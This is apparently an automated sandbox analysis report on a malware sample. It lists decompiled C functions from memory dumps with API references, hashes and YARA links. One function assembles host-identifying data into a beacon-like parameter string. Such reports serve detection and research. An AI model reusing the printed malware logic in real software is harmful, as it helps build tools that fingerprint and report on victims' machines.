Instruction ID: 140ce0aa516f3fdd2ecd8277e340f627aa500f0cb82bf621aa146327f9437859
Opcode Fuzzy Hash: 76aace753743a51d4a5b7e1f2ba2b180d76349526be49a18216bd78909aecb8d
Instruction Fuzzy Hash: 3C6114F3A00B10CFEB18CF69C5D8A5577A7F7AA700B01822FD509872D6D6B4AA44DB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A2184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E1A2184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1A22EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E1A23A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E1A2290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1A22EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E1A2387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e1a2188
0x6e1a2189
0x6e1a218a
0x6e1a218d
0x6e1a218f
0x6e1a2192
0x6e1a2193
0x6e1a2195
0x6e1a2196
0x6e1a2197
0x6e1a219a
0x6e1a21a4
0x6e1a2255
0x6e1a225c
0x6e1a2265
0x6e1a21aa
0x6e1a21aa
0x6e1a21b0
0x6e1a21b6
0x6e1a21b9
0x6e1a21bc
0x6e1a21c0
0x6e1a21c5
0x6e1a21ca
0x6e1a224a
0x00000000
0x6e1a21cc
0x6e1a21cc
0x6e1a21d8
0x6e1a21da
0x6e1a2235
0x6e1a2235
0x6e1a223b
0x00000000
0x6e1a21dc
0x6e1a21eb
0x6e1a21ed
0x6e1a21ee
0x6e1a21ef
0x6e1a21f2
0x6e1a21f2
0x6e1a21f4
0x00000000
0x6e1a21f6
0x6e1a21f6
0x6e1a2240
0x6e1a21f8
0x6e1a21f8
0x6e1a21fc
0x6e1a2204
0x6e1a2209
0x6e1a220e
0x6e1a221a
0x6e1a2222
0x6e1a2229
0x6e1a222f
0x6e1a2233
0x00000000
0x6e1a2233
0x6e1a21f6
0x6e1a21f4
0x00000000
0x6e1a21da
0x6e1a224e
0x6e1a224e
0x6e1a224e
0x6e1a21ca
0x6e1a226a
0x6e1a2271

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 4b3ee156dc381b57269a108a296b916d3d9d31c657feb752b6991c6434cae8f6
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 4721D6769002059FD700DFADDC809B7BBAAFF49350B058469DA19CB245D730FA55D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 02EAAF80, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E02EAAF80(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E02EAB0EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E02EAB1A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E02EAB090(_t55, _t66);
										_t89 = _t66 + 0x10;
										E02EAB0EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E02EAB187(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x02eaaf84
0x02eaaf85
0x02eaaf86
0x02eaaf89
0x02eaaf8b
0x02eaaf8e
0x02eaaf8f
0x02eaaf91
0x02eaaf92
0x02eaaf93
0x02eaaf96
0x02eaafa0
0x02eab051
0x02eab058
0x02eab061
0x02eaafa6
0x02eaafa6
0x02eaafac
0x02eaafb2
0x02eaafb5
0x02eaafb8
0x02eaafbc
0x02eaafc1
0x02eaafc6
0x02eab046
0x00000000
0x02eaafc8
0x02eaafc8
0x02eaafd4
0x02eaafd6
0x02eab031
0x02eab031
0x02eab037
0x00000000
0x02eaafd8
0x02eaafe7
0x02eaafe9
0x02eaafea
0x02eaafeb
0x02eaafee
0x02eaafee
0x02eaaff0
0x00000000
0x02eaaff2
0x02eaaff2
0x02eab03c
0x02eaaff4
0x02eaaff4
0x02eaaff8
0x02eab000
0x02eab005
0x02eab00a
0x02eab016
0x02eab01e
0x02eab025
0x02eab02b
0x02eab02f
0x00000000
0x02eab02f
0x02eaaff2
0x02eaaff0
0x00000000
0x02eaafd6
0x02eab04a
0x02eab04a
0x02eab04a
0x02eaafc6
0x02eab066
0x02eab06d

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: ccb8017fb90f65172ce2a37fcfcdf06630f2f0297f0dc7c72aee29e134307588
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: EE21B272940204DBCB14DF68C8D59ABBBA5FF58358B05C1ACE9258F245D730F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D68E0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 12dfb0185a5d56c028b17d6ba0e932e21bc7bd42f9a3171f314a6678b2eb98b0
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 7F119EF726004B4FD68C89EEC4B06A6F795EBE6220738437AD0A34B64CC12390CDB502

Uniqueness

Uniqueness Score: -1.00%

Function 6E203E83, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.484393967.000000006E203000.00000040.00020000.sdmp, Offset: 6E203000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 136797d837af17e3c6baf276b05350edf5f6aa976853367dcb07b042dbd4c2ec
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 9D11BE73340105AFD754DE99EC95EA2B3EAFF99230B258166ED04CB341D776E812C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E20427C, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.484393967.000000006E203000.00000040.00020000.sdmp, Offset: 6E203000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: c01ade67113ac7e80a6aa8d10a92b711cfd10e56d61bdff20a85d32e22bb7d18
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 2601223631420A8FD744CBAAD894D6EB7E5EBE2325B15C07FC84683659D230E847CA20

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1F13, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02EA1F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2ead018; // 0xc25f505c
				asm("bswap eax");
				_t27 =  *0x2ead014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2ead010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x2ead00c; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x2ead2a8; // 0xb1a5a8
				_t3 = _t30 + 0x2eae633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26, E02EAD02C,  *0x2ead004, _t25);
				_t33 = E02EA56CD();
				_t34 =  *0x2ead2a8; // 0xb1a5a8
				_t4 = _t34 + 0x2eae673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E02EA58DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x2ead2a8; // 0xb1a5a8
					_t6 = _t83 + 0x2eae8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2ead238, 0, _t96);
				}
				_t97 = E02EAA199();
				if(_t97 != 0) {
					_t78 =  *0x2ead2a8; // 0xb1a5a8
					_t8 = _t78 + 0x2eae8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2ead238, 0, _t97);
				}
				_t98 =  *0x2ead32c; // 0x39c95b0
				_a32 = E02EA4622( &E02EAD00A, _t98 + 4);
				_t42 =  *0x2ead2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2ead2a8; // 0xb1a5a8
					_t11 = _t74 + 0x2eae8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2ead2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2ead2a8; // 0xb1a5a8
					_t13 = _t71 + 0x2eae88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2ead238, 0, 0x800);
					if(_t100 != 0) {
						E02EA518F(GetTickCount());
						_t50 =  *0x2ead32c; // 0x39c95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2ead32c; // 0x39c95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2ead32c; // 0x39c95b0
						_t103 = E02EA1BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2eac28c);
							_push(_t103);
							_t62 = E02EA361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02EA6777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02EA6761();
								}
								HeapFree( *0x2ead238, 0, _v44);
							}
							HeapFree( *0x2ead238, 0, _t103);
						}
						HeapFree( *0x2ead238, 0, _t100);
					}
					HeapFree( *0x2ead238, 0, _a24);
				}
				HeapFree( *0x2ead238, 0, _t105);
				return _a12;
			}

0x02ea1f13
0x02ea1f13
0x02ea1f13
0x02ea1f18
0x02ea1f1e
0x02ea1f28
0x02ea1f2a
0x02ea1f2a
0x02ea1f37
0x02ea1f42
0x02ea1f45
0x02ea1f50
0x02ea1f53
0x02ea1f58
0x02ea1f5b
0x02ea1f60
0x02ea1f63
0x02ea1f6f
0x02ea1f7c
0x02ea1f7e
0x02ea1f84
0x02ea1f89
0x02ea1f94
0x02ea1f96
0x02ea1f99
0x02ea1fa0
0x02ea1fa4
0x02ea1fa6
0x02ea1fab
0x02ea1fb7
0x02ea1fb9
0x02ea1fc5
0x02ea1fc7
0x02ea1fc7
0x02ea1fd2
0x02ea1fd6
0x02ea1fd8
0x02ea1fdd
0x02ea1fe9
0x02ea1feb
0x02ea1ff7
0x02ea1ff9
0x02ea1ff9
0x02ea1fff
0x02ea2012
0x02ea2016
0x02ea201d
0x02ea2020
0x02ea2025
0x02ea2030
0x02ea2032
0x02ea2035
0x02ea2035
0x02ea2037
0x02ea203e
0x02ea2041
0x02ea2046
0x02ea2050
0x02ea2052
0x02ea205a
0x02ea2073
0x02ea2077
0x02ea2083
0x02ea2088
0x02ea2091
0x02ea20a2
0x02ea20a6
0x02ea20af
0x02ea20b5
0x02ea20c2
0x02ea20cf
0x02ea20d5
0x02ea20e1
0x02ea20e7
0x02ea20e8
0x02ea20ed
0x02ea20f3
0x02ea20f9
0x02ea2100
0x02ea2107
0x02ea210d
0x02ea2114
0x02ea2118
0x02ea2123
0x02ea2128
0x02ea212e
0x02ea2137
0x02ea2137
0x02ea2148
0x02ea2148
0x02ea2157
0x02ea2157
0x02ea2166
0x02ea2166
0x02ea2178
0x02ea2178
0x02ea2187
0x02ea2198

APIs

GetTickCount.KERNEL32 ref: 02EA1F2A
wsprintfA.USER32 ref: 02EA1F77
wsprintfA.USER32 ref: 02EA1F94
wsprintfA.USER32 ref: 02EA1FB7
HeapFree.KERNEL32(00000000,00000000), ref: 02EA1FC7
wsprintfA.USER32 ref: 02EA1FE9
HeapFree.KERNEL32(00000000,00000000), ref: 02EA1FF9
wsprintfA.USER32 ref: 02EA2030
wsprintfA.USER32 ref: 02EA2050
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02EA206D
GetTickCount.KERNEL32 ref: 02EA207D
RtlEnterCriticalSection.NTDLL(039C9570), ref: 02EA2091
RtlLeaveCriticalSection.NTDLL(039C9570), ref: 02EA20AF

Part of subcall function 02EA1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,02EA20C2,?,039C95B0), ref: 02EA1BE1
Part of subcall function 02EA1BB6: lstrlen.KERNEL32(?,?,?,02EA20C2,?,039C95B0), ref: 02EA1BE9
Part of subcall function 02EA1BB6: strcpy.NTDLL ref: 02EA1C00
Part of subcall function 02EA1BB6: lstrcat.KERNEL32(00000000,?), ref: 02EA1C0B
Part of subcall function 02EA1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02EA20C2,?,039C95B0), ref: 02EA1C28

StrTrimA.SHLWAPI(00000000,02EAC28C,?,039C95B0), ref: 02EA20E1

Part of subcall function 02EA361A: lstrlen.KERNEL32(039C9A78,00000000,00000000,7742C740,02EA20ED,00000000), ref: 02EA362A
Part of subcall function 02EA361A: lstrlen.KERNEL32(?), ref: 02EA3632
Part of subcall function 02EA361A: lstrcpy.KERNEL32(00000000,039C9A78), ref: 02EA3646
Part of subcall function 02EA361A: lstrcat.KERNEL32(00000000,?), ref: 02EA3651

lstrcpy.KERNEL32(00000000,?), ref: 02EA2100
lstrcpy.KERNEL32(00000000,00000000), ref: 02EA2107
lstrcat.KERNEL32(00000000,?), ref: 02EA2114
lstrcat.KERNEL32(00000000,00000000), ref: 02EA2118

Part of subcall function 02EA6777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 02EA6829

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02EA2148
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02EA2157
HeapFree.KERNEL32(00000000,00000000,?,039C95B0), ref: 02EA2166
HeapFree.KERNEL32(00000000,00000000), ref: 02EA2178
HeapFree.KERNEL32(00000000,?), ref: 02EA2187

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: 8e28b993537f68534c0bb89f40c0b8c325bd19aa07fd262b414ca13fb70b65c6
Instruction ID: 91b7fc706901c2100b429d61c3f23efb78eb79bff4756acf6affc28c4eb61f02
Opcode Fuzzy Hash: 8e28b993537f68534c0bb89f40c0b8c325bd19aa07fd262b414ca13fb70b65c6
Instruction Fuzzy Hash: 8261F3319C0200AFC711AB6AEC89F967BE9EF48344F554914FA08DB260DB34F8A5DB71

Uniqueness

Uniqueness Score: -1.00%

Function 02EA6C38, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E02EA6C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x2ead33c; // 0x39c9798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E02EAA557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x2eac18c;
				}
				_t46 = E02EA18A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E02EAA71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x2ead2a8; // 0xb1a5a8
						_t16 = _t75 + 0x2eaeb08; // 0x530025
						 *0x2ead118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E02EAA557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x2eac190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E02EAA71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E02EAA734(_v20);
						} else {
							_t66 =  *0x2ead2a8; // 0xb1a5a8
							_t31 = _t66 + 0x2eaec28; // 0x73006d
							 *0x2ead118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E02EAA734(_v12);
				}
				return _v24;
			}

0x02ea6c40
0x02ea6c46
0x02ea6c4d
0x02ea6c53
0x02ea6c57
0x02ea6c5b
0x02ea6c5e
0x02ea6c63
0x02ea6c68
0x02ea6c6a
0x02ea6c6a
0x02ea6c73
0x02ea6c78
0x02ea6c7d
0x02ea6c83
0x02ea6c8d
0x02ea6c96
0x02ea6c9d
0x02ea6cb6
0x02ea6cbb
0x02ea6cc0
0x02ea6cc9
0x02ea6cd2
0x02ea6ce3
0x02ea6cec
0x02ea6cf0
0x02ea6cf4
0x02ea6cf9
0x02ea6cfe
0x02ea6d00
0x02ea6d00
0x02ea6d0a
0x02ea6d13
0x02ea6d1a
0x02ea6d32
0x02ea6d36
0x02ea6d73
0x02ea6d38
0x02ea6d3b
0x02ea6d43
0x02ea6d54
0x02ea6d60
0x02ea6d68
0x02ea6d6c
0x02ea6d6c
0x02ea6d36
0x02ea6d7b
0x02ea6d80
0x02ea6d87

APIs

GetTickCount.KERNEL32 ref: 02EA6C4D
lstrlen.KERNEL32(?,80000002,00000005), ref: 02EA6C8D
lstrlen.KERNEL32(00000000), ref: 02EA6C96
lstrlen.KERNEL32(00000000), ref: 02EA6C9D
lstrlenW.KERNEL32(80000002), ref: 02EA6CAA
lstrlen.KERNEL32(?,00000004), ref: 02EA6D0A
lstrlen.KERNEL32(?), ref: 02EA6D13
lstrlen.KERNEL32(?), ref: 02EA6D1A
lstrlenW.KERNEL32(?), ref: 02EA6D21

Part of subcall function 02EAA734: HeapFree.KERNEL32(00000000,00000000,02EA5637,00000000,?,?,00000000), ref: 02EAA740

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 6afeced7c007a5b975e8d25d9b128d2e6f9e507c4aeed1cbf8d6c6bd6701878d
Instruction ID: e7719c68f7e47198187e138e9c27daa62a32525b40fdf8ffcfd7a2fab9a4d284
Opcode Fuzzy Hash: 6afeced7c007a5b975e8d25d9b128d2e6f9e507c4aeed1cbf8d6c6bd6701878d
Instruction Fuzzy Hash: DF416D72D80219FBCF11AFA5CC589DEBBB5EF44348F154461F904AB220D735AA60DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAD66, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6E200C28,0000000C,6E1DAEA1,00000000,00000000,?,6E1CC9C7,6E1D8C30,6E1D50D1,?,?,6E1CC9C7,0000041D), ref: 6E1DAD78
__crt_waiting_on_module_handle.LIBCMT ref: 6E1DAD83

Part of subcall function 6E1DCC55: Sleep.KERNEL32(000003E8,?,?,6E1DACC9,KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DCC61
Part of subcall function 6E1DCC55: GetModuleHandleW.KERNEL32(6E1CC9C7,?,?,6E1DACC9,KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DCC6A

__lock.LIBCMT ref: 6E1DADDE
InterlockedIncrement.KERNEL32(207CA16E), ref: 6E1DADEB
__lock.LIBCMT ref: 6E1DADFF
___addlocaleref.LIBCMT ref: 6E1DAE1D

Strings

KERNEL32.DLL, xrefs: 6E1DAD72, 6E1DAD77, 6E1DAD82

Memory Dump Source

Source File: 00000002.00000002.483277940.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: KERNEL32.DLL
API String ID: 4021795732-2576044830
Opcode ID: e0dcbc5c8770e3a254a9cf15aeaf7a14007286be2fffe1191aed1cf74ec4f160
Instruction ID: 3afaf870f58e490e8322f7e58af8c73fc95c5d0ef1a7f59ac73937ae6c2eb39b
Opcode Fuzzy Hash: e0dcbc5c8770e3a254a9cf15aeaf7a14007286be2fffe1191aed1cf74ec4f160
Instruction Fuzzy Hash: 17118E71800B01DBD760DFF5C804B9EBBF9AF04314F20891AE4AAA7290CB74A985EB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D2490, Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D2680: _localeconv.LIBCMT ref: 6E1D2687

std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D24F6

Part of subcall function 6E1D2740: _strlen.LIBCMT ref: 6E1D274A

std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2526
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D255E
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D25BD
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D25E3
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2612
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2634
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2653

Memory Dump Source

